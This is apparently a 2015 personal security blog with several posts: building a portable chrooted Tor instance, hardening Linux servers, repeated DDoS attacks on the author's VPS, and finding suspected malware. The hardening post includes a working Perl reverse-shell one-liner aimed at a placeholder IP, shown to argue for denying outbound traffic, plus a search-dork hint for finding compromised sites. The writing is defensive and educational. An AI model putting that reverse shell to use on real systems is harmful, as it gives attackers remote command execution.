Sunday, June 21, 2015

Building a Portable, Chrootable Tor Instance on a Dedicated Development VM

In my last post I talked about various ways of locking down your system to mitigate compromises. One method of securing a system I mentioned is to chroot programs that are running public services. Chrooted programs run in their own little 'sandboxes', or 'jails', which are nothing more than a complete filesystem with everything that the program needs to run inside a directory that is owned by the root user. This limits the programs attack vector because the program and the user it's running as can only access files and directories inside it's environment. If the program is compromised, a chroot should protect the rest of the system from compromised as well.

While the concept is easy enough to understand, the implantation can be a little tricky. Different distributions of Linux, although running 98% of the same software, have different file system structures. It's not exactly difficult to figure out where all those libraries are, but it can be tedious and annoying. That's probably why chroots aren't used as often as they should be. There are some solutions that make the process easier, like using Sandfox. There is also Debootstrap for Debian systems, although I can't speak for it because I have yet to use it. However, sometimes it's better to accomplish something without installing any extra software, especially if the target system is a production server.

As mentioned in my last post, it is a security risk to have compilers on your system. Compilers can make things much easier for attackers to compromise your system. One solution to these issues is to compile all your software in a virtual machine, which is also hosted on a dedicated system. I just love virtual machines. They're very convienient, forgiving, portable, and disposable. If anything ever goes wrong on a VM, you simply restore the system to a snapshot that you (hopefully) made immediatly after installing and configuring the system. So, let's set up a virtual development system to run all of our compiliers on. Then we will compile and create a portable, chrooted instance of Tor, which we can than run on any server that we need.

Ideally, your virtual machines should run on a dedication system. The system does not have to be terribly powerful, so you could probably use one of your old computers that are collecting dust in the closet. For my dedicated box, I chose straight headless Debian. I created a seperate user to run Virtualbox, and also a seperate partition to store and run the virtual machines on, for security. It's best to make sure this partition is of descent size, (at least 50 gigs). It's also good to partition the disc ahead of time rather than relying on the installer to do that for you. Setting up a Debian system and installing vboxheadless is beyond the scope of this post, but there are plenty of resources on the net if you need help with that.

Once you have your system running, secure it with SSH and a firewall. Next, install vboxheadless, and phpvirtualbox if you want a nice graphical interface to manage your VM's. Now you just need to create a new virtual machine and install a Linux distro of your choice on it. It doesn't really matter which distro your go with, but for simplicity's sake I'd recommend Ubuntu Server Edition. However, if your physical system has enough resource, it would be bennificial to install a 64 bit version. You can always compile for 32 bit systems on a 64 bit system, but not the other way around.

Now you need to either follow the directions found here to compile tor in a chroot, or you can use this script that I wrote to do it for you. Note that the script was only tested on an Ubuntu 14.04 i686 system, so your milage may vary on other distros. Also note that every script I've ever gotten off github for this particular task failed when I ran it, so I won't be surprised if mine fails for you as well. The script also actually creates a functional tor chroot, which is not really necessary if you just want to compile it for use on other systems. If you follow the directions on the tor project site, after you verify that your tor chroot works, just run:

sudo cp -R -p $TORCHROOT /tmp/tor-chroot
sudo tar -zcvf ~/tor-chroot.tar.gz /tmp/tor-chroot

And you will have a tar.gz archive that you can simply extract on any Linux server and run. Of course, you will have to add the tor user to that system first

sudo useradd -d /home/tor -s /bin/false tor

After that's done, you can just run this command to start it:

sudo chroot $TORCHROOT /tor/bin/tor

And finally, follow the instructions on the tor site to create an init script if you want. This process could be used to create chroots for other programs as well. One last recommendation, record the sha512sum of the resulting archive and also sign it with your gpg key so that you can later verify it's integrity.

Saturday, June 20, 2015

Locking Shit Down

I don't know if it's just me, but it seems like there is an awful lot of funny stuff going on in the cloud as of late. After the Sony hacks, I predicted that 2015 would be a bad year for cyber security. Looks like I was right about that, considering every branch of our federal government was hacked recently. Now, I manage a few servers myself, and I've had my share of compromises too. But the last few months have been utterly ridiculous. I have reinstalled my personal system 4 times since January because I suspected some malware had snuck onboard, and I'm getting really sick of doing that. Today I reinstalled & rebuilt yet another server from scratch, which is a major pain in the ass.

This is the server I'd been running a Kippo SSH honeypot on. I had Kippo running for about a month or so, and from that experience I cannot recommend that anyone run a honeypot on a server that they run other services on. It's just not worth the risk. Yeah, Kippo is relatively secure, and sure it's an emulated shell that is not capable of doing much, but that does not mean it can't be hacked. In the end, (if nothing else), it's just another open port to worry about.

Run Public Services On Separate Systems

This should be obvious, but let's narrow the definition of public. When you have a box running a VPN server, bittorent server, web server, honeypot, and tor relay... well, things can get messy. It is definitively more secure to dedicate a system to a particular task, and manage several smaller systems than it is to run everything on one big powerful box and attempt to lock it all down. In the age of cheap & abundant virtualization, there's no reason not to segregate your servers. My advice is to at least keep the public services (bittorent, web server, tor, etc) on a different server than your personal cloud storage box, or what-have-you. Consider a bittorent client for a moment. It is generally seen as a pretty benign risk service to run (all legal issues aside), and overall, clients like Transmission have stood the test of time. But bittorent clients connect with tens of thousands of different hosts everyday, and all it takes is a few bad packets and a zero day exploit to ruin your day. Torrent clients also seem to be written specifically to evade firewalls, as they work just fine under very strict rules. You don't even need to open a port, the program will figure out a way to connect to the peer, wherever they are. 

Deny Outbound Connections

In this day and age, it's no longer sufficient to keep your firewall's outbound policy to ACCEPT while dropping inbound connections. Why? Imagine you're running a webserver of some sort, and somebody manages to find an exploit that allows them to upload even a one line of rogue php (this happens all of the time). For example, if this manages to be written to a file on your server, and your outbound policy is set to ACCEPT, the attacker will get a shell with whatever privledges the server user has:


perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"1.2.3.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If your system is not fully up to date, (or even if it is) all it takes is some privelege escalation exploit, or slight misconfiguration of permissions in the serving directory, and you are screwed. By the way, I tested this on a fresh Ubuntu 14.04 server, running apache as it is out of the box, with success. Most Linux systems have Perl installed on them, and removing it is a real pain (too many services depend on perl, and besides, perl is cool!). Denying outbound connections would prevent this from working, and chrooting apache as well would severely limit the attack vector. If you think this is paranoia, try googling something like "inurl:/r00t.php".

For locking down an apache server that is only serving clients to a particular private subnet, you could use something like this:

$IPT -A INPUT -i eth0 -s 10.0.0./24 -d 10.0.0.1 -p tcp -m tcp --dport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -s 10.0.0.1 -d  10.0.0./24 -p tcp --sport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -m owner --uid-owner www-data -j REJECT
 


Run Everything as a Different User

This should be number one. Considering the example above, when an attacker manages to get a shell on your system, they are limited to the resources running as and owned by that user. If you implement proper access control policies, than even if someone manages to get a shell, they will not be able to access the files and programs that are owned by different users. Our old friend Mr Meterpreter, is a perfect example of how privilege separation could have saved a lot of systems from rape and pillage. When someone manages to get a meterpreter trojan onto your Windows system, it is game over. Your webcam, microphone, 'My Documents' folder, and usually most of your C:\ drive is accessable by you, the user. Yeah, I know that's just how personal computers work, but it's also a good reason to use Linux and lock your shit down. The functionality of Metasploit's meterpreter on a linux machine is much, much more limited than it is on a Windows system, and mostly because of privilege separation,.

Chroot Everything Else

Another priceless tip is to chroot services that are open to the world instead. I don't understand why chrooting is not used more often. A strong chroot combined with a strict firewall should be enough to stop most attackers before they can do any real harm. Chroots are basically 'jails' for programs. A chroot consists of a directory inside a directory that is owned by root, with an entire fake unix filesystem inside that directory. So, for a tor chroot, you'd have for instance '/chroot' owned by root, and than '/chroot/tor' owned by a user with limited privileges and no valid shell. Than you would use the ldd command to figure out which libraries tor depends on to operate, and you'd copy them all into the /chroot/tor/ directory, so you'd have '/chroot/tor/var' and '/chroot/tor/lib', 'chroot/tor/etc', etc... If a hacker manages to break into the chroot, than they can do as much damage as they want to the tor service, but nothing else. That is at least the theory.

Edit: A note on chroots. A chroot can easily be created for most occaisons with the program Sandfox, which is written entirely in bash, so it works on all Linux systems and possibly even mac systems. It's perfect for chrooting Firefox, which will drastically improve your defenses against client side attacks on Desktop systems.

Use a Password Manager

Keyloggers are pretty useless when you don't type. Password managers are excellent because you can generate, copy and than paste a password where it's needed, and never have to type the password itself. Yes, there are some advanced trojans out there that can read the clipboard (and some not so advanced ones on Android systems...), but generally this is a really good move. It's also a lot easier to have /dev/urandom come up with your passwords than it is to invent your own totally random, 40 character stings. If at all possible, don't even use passwords, or use some kind of dual factor authentication system. Even in 2015, weak passwords are still one of the most common mistakes leading to full system compromise.

Use Separate Partitions

This should be a no-brainer, but it's just not. Even the Debian installer still struggles to properly partition a disk with seperate /var /tmp /usr /home /root & /boot partitions. Usually the installer fails because it does not allocate enough space to /root, and the system will not fit on the drive. I really wish someone would fix that. The solution is to partition the drive yourself before your install it. Use something like a Gparted live disc, because IME the installers built in partitioner really sucks. When you have, for example, /tmp on it's own partition, you can set things like nodev, nosuid, and noexec for that partition. This goes a hell of a long way keeping your system secure. The /tmp is generally world readable, writable and executable, and is almost always where a hacker will first try to download his malware after getting a shell.

Uninstall/Disable Whatever You Don't Need

The more applications running any given system, the more code there is to mess with, and hence more attack vectors. If you don't need a print server, get rid of CUPS! If you don't use RPC services, get rid of rpcbind. If you don't need service discovery, get rid of avahi. You get the point. Oh, one last thing... if you don't compile your own code, uninstall the compliers! It's often easier to upload a text file than a binary file, particular in the web app world.

Edit: Personally, I need the compilers, so instead of removing them you can just limit their execution to the superuser:

~: dpkg --list | grep compiler
ii  g++                           4:4.9.2-2ubuntu2   amd64   GNU C++ compiler
ii  g++-4.9                       4.9.2-10ubuntu13   amd64   GNU C++ compiler
ii  gcc                           4:4.9.2-2ubuntu2   amd64   GNU C compiler
ii  gcc-4.9                       4.9.2-10ubuntu13   amd64   GNU C compiler


~: cd /usr/bin
~: chmod 750 g++-4.9  gcc-4.9

Wednesday, June 10, 2015

DDOS'ing Someone is Not an Effective Way to Send a Message

Over the past few months, I have been getting emails from one of my vps providers informing me that I am constantly under DDOS attack. Sometimes it will happen once a week, other times up to 3 times in one day. Since the server is behind my providers insanely awesome firewall, I seldom notice any performance downgrade. However, there are those rare occaisons when the attacks get really bad, and my provider will shut the server down for a few minutes, which has disrupted my work.

I got an email from them today informing me that I was DDOS'd 3 times yesterday, and once today. They also asked me if I knew why I was being attacked so frequently. That's the first time anyone's ever asked me that. I replied "I have no idea... I wish I knew!"  It's remiscant of the 5 day attack on GIthub from China, in that the maintainers of Github had absolutely no idea why they were being attacked. They said something like "that's the frusterating thing about DDOS attacks-- it's impossible to know what the motive is."

Yeah, that about sums it up. It takes an awful lot of effort and cooridation to organize an attack like this, and if its going to be effective, than it will generally require hundreds of machines, at least. I've considering putting a message board on the server with a form, asking "Who the fuck are you, and what do you want?"

... But that would probably just open up another attack vector for them to use against me, whoever they are. It's like holding somebody captive for ransom and failing to send a note explaining what you want... Perhaps there is no message. I thought maybe it's a rival VPS provider that is trying to get customers to switch over to them, but if that is the case, wouldn't it be more effective to attack the VPS farm's gateway instead of one of the clients? I also checked my spam emails, and there are no letters from VPS providers soliciting a service, so that can't be the case. And according to my provider, I am, with certainty, the target.

I only wish that I knew why I am being targeted. Everytime this happens, I ask them if they'd give me the IP address's of the attackers, because I am curious to see which country it's coming from. So far, they have not told me. It's difficult to figure out where the attacks are coming from by looking at the kernel logs, because the attacks are filtered by the provider's firewall before they ever hit me. So I have to resort to guessing, again...

Tuesday, June 2, 2015

Yes, Bad Stuff Happens of Linux, But it Doesn't Have To

Not to dis on the kernel, but this notion needs to be addressed. Quite frequently when viewing the community forums, when someone asks a question about potentially having malware on their box, about 9 out 10 ten times someone with a big reputation comes along and says something like "I would not worry about it, you're not on Windows anymore." Then, 8 times out of 10, the person who started the thread says "OK", no further investigation is done. This is a dangerous attitude, and it's simply not true.

There is always that guy (you know the one) who drops in with his 20,000 reputation and 100 badges, and says "I've been using Unix for 30 years now, and in all that time I have never actually seen a rootkit, only false positives." Well, I have only been using Linux for 3 or 4 years, and I've seen malware. In fact, just last night I found something that looked a lot like malware inside one of my own systems. In order to do so, I had to boot to a Kali live disk and run some extensive tests. Both chkrootkit and rkhunter initially only me a bunch of warnings, but than I ran this command...

chkrootkit -x | egrep '^/'

, which find strings inside binaries, and I was absolutely shocked at what I saw. Many programs in /bin had been replaced by symlinks that were very difficult to navigate through because they were very complex, and linked through many directories before ending up at /etc/alternatives, or /etc/.java (don't ignore those unnecessary compiler warnings). I saved the output of that command (which what 1.7 mbs long), and unfortunately, I seem to have lost the file, which sucks because I really wanted to show you what I'm talking about. I guess you're having to take my word for it. Usually this happens because of bad security practices, but I take insane security precautions! I use 40 character random strings for all passwords, have really tight firewall rules, run linux, use 4096 bit RSA keys for ssh (wish ecdsa would work), etc. The truth is I don't know how it happened, but I intend to find out. So after I fixed that server, I started to try to exploit all my own servers and the services running on them. So far, it's been pretty eye opening.

When one starts to learn about offensive security, one realizes computers are really vulnerable when misconfigured (or lazily configured). I never really like the idea of the whole cat and mouse/crack and patch approach to security. I figured that if you just build the damn thing from the ground up with security as the first priority, than you are good. And, yeah that turned out to be true. However, that approach does not work if you are, for instance... using someone else's content management system. You might do that because you don't feel like studying the php manual for 6 weeks before launching your own blog. I hear you. Recently I deployed a php cms without pentesting it first. When I finally did pentest the site, I discovered multiple severe vulnerabilities including remote OS command injection. I was even running mod security (but had not take the time to read that manual either). I scanned it with skipfish, discovered some low threat XSS vulnerabilities, it didn't seem like a big deal. But than I scanned it with OSWAP, which is like metasploit community edition for HTTP servers. This program gave me exactly the information I needed to both exploit my site, and fix it. One reason I choose this CMS is because I fucking hate sql, and this app did not need it. SQL is a nightmare, and probably the most exploited protocol on the net today. Have you ever tried to salvage a corrupt database? Nooo thanks. But php configured the way that it is out of the box is a recipe for disaster. It's a great example of default permit. For God's sake, the developers ought to ship it with command execution disabled. If someone needs that feature, they should have to enable it themselves so that they understand the risks.

Anyway, a few hours of Googling, and I had most of the vulnerabilities on the site patched. The patches were all very simple things like setting the correct http headers, cache controls, mod security & php.ini directives, blah blah . I barely had to edit any of the actual php. So, crack and patch has it's place. There is definitively no substitute for building your program securely, and your mantra should be default deny.

On the age old 'linux can't get malware' argument, I say yes it can, but it does not have to. Linux has more than enough tools you can use to prevent these kind of things from happening, and they're all free. On a closed platform like Microsoft Windows, which also happens to have a huge multi billion dollar antivirus industry that depends on those insecurities, bad things will happen. But on an open source, community driven platform with an incentive to function correctly, bad thing generally open happen if you let them. I suppose the biggest lesson I've learned thus far with the offense approach is to not trust other people's code. Besides, it's pretty fun (and totally legal) to try to exploit that code, when it's running on your own server. That's all for today.